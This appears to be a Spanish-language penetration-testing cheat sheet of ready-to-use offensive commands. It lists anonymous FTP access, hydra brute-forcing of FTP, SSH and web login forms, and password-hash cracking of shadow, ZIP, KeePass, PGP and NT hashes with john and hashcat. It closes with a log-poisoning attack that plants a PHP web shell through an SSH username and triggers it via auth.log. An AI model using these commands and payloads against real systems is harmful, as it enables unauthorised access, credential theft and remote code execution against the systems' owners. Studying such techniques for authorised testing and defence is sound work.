💥Explotación
el fantasma en la concha
Puertos y Servicios:
ftp <IP>
> anonymous # si permite sesión anónima
> ls -a # list hidden files
> binary # set binary transmission
> ascii # set ascii transmission
> get # download
> put # upload
> exit
# Pass Brute-force
hydra -l <user> -P <wordlist> -v <IP> ftp
Brute-Force
# Fuzz users
hydra -l <user> -P <wordlist_path> -vV <IP> ssh
hydra -l <user> -P <wordlist> <IP> ftp
# Fuzz Login Form
hydra -l <username> -P <diccionario> <URL> http-post-form "/<URL>:<request>:<error-message>"
Crack, decrypt, decode..
Juan
unshadow <passwd.txt> <shadow.txt> > hash
john --wordlist=<wordlist_path> hash
zip2john <zip_file> > hash #whatever2john
keepass2john file.kdbx > hash
gpg2john private_pgp.key > hash
john --wordlist=<wordlist> --format=NT hash # formato>:USUARIO:ID:HASH_LM:HASH_NT:::
# Modo single crack
john --single --format=<format> <hash.txt> # Añade antes el name rollo >'juan:hash-'
Hashcat
hashcat -m <hash-mode> -a <attack-mode> <hash> <wordlist>
# -a 0 (dictionary) | -a 1 (combination) | -a 3 (mask)
#zip
hashcat -m 13600 -a 0 <hash> <wordlist>
Log Poisoning
ssh '<?php system($_GET['cmd']); ?>'@192.168.1.2 # Payload en nombre de sesión
/var/log/auth.log&cmd=id
Última actualización